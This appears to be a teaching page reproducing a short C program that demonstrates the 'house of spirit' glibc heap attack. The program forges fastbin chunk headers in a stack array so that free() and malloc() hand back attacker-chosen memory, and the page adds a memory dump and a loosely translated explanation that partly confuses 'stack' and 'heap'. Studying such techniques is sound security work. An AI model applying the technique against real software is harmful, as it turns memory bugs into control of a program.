Source
1 #include <stdio.h> 2 #include <stdlib.h> 3 4 int main() 5 { 6 fprintf(stderr, "This file demonstrates the house of spirit attack.\n"); 7 8 fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n"); 9 malloc(1); 10 11 fprintf(stderr, "We will now overwrite a pointer to point to a fake 'fastbin' region.\n"); 12 unsigned long long *a; 13 // This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY) 14 unsigned long long fake_chunks[10] __attribute__ ((aligned (16))); 15 16 fprintf(stderr, "This region (memory of length: %lu) contains two chunks. The first starts at %p and the second at %p.\n", sizeof(fake_chunks), &fake_chunks[1], &fake_chunks[9]); 17 18 fprintf(stderr, "This chunk.size of this region has to be 16 more than the region (to accomodate the chunk data) while still falling into the fastbin category (<= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n"); 19 fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n"); 20 fake_chunks[1] = 0x40; // this is the size 21 22 fprintf(stderr, "The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.\n"); 23 // fake_chunks[9] because 0x40 / sizeof(unsigned long long) = 8 24 fake_chunks[9] = 0x1234; // nextsize 25 26 fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]); 27 fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n"); 28 a = &fake_chunks[2]; 29 30 fprintf(stderr, "Freeing the overwritten pointer.\n"); 31 free(a); 32 33 fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]); 34 fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30)); 35 }
operation result
First with an array of application memory size of a piece of 0x40
Modified as follows
1 0x00 0x0000000000000000 0x0000000000000040 2 0x10 0x0000000000000000 0x0000000000000000 3 0x20 0x0000000000000000 0x0000000000000000 4 0x30 0x0000000000000000 0x0000000000000000 5 0x40 0x0000000000000000 0x0000000000001234
Forged into a 0x30 + 0x10 0x00 to 0x40 in size over the heap
After a stack has forged head, size of 0x1234 compliance (> 16b && <128kb) detecting bypass
After releasing the forged heap that will enter the fastbin 0x40
After re-apply for 0x30 size of the heap that will be assigned to this fake heap
It is noted here that the size to meet fastbin, also modify the adjacent lower stack size the size of a compliance (> 16b && <128kb) to bypass detection.